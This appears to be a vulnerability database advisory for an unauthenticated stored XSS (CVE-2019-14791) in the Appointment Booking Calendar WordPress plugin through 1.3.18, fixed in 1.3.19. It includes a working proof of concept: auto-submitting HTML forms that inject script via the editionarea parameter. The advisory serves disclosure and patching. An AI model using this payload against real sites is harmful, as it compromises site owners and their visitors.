Appointment Booking Calendar <= 1.3.18 - Unauthenticated Stored XSS



Description
Lack of authorisation check in the cpabc_appointments_save_edition() function can lead to stored XSS via the editionarea parameter when cfwpp_edit is set to 'js' or 'css'
Proof of Concept
<body onload="document.forms[0].submit();">
	<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
		<input type="hidden" name="CP_ABC_post_edition" value=""/>
		<input type="hidden" name="cfwpp_edit" value="js"/>
		<input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
	</form>
</body>

<body onload="document.forms[0].submit();">
	<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
		<input type="hidden" name="CP_ABC_post_edition" value=""/>
		<input type="hidden" name="cfwpp_edit" value="css"/>
		<input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
	</form>
</body>

The payload will be triggered in all pages with a booking form.

Affects Plugin

fixed in version 1.3.19

References

CVE 2019-14791
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2117259%40appointment-booking-calendar&old=2112885%40appointment-booking-calendar

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 3373
Verified Yes
WPVDB ID 9426

Timeline

Publicly Published 2019-07-04 (5 months ago)
Added 2019-07-05 (5 months ago)
Last Updated 2019-11-27 (11 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin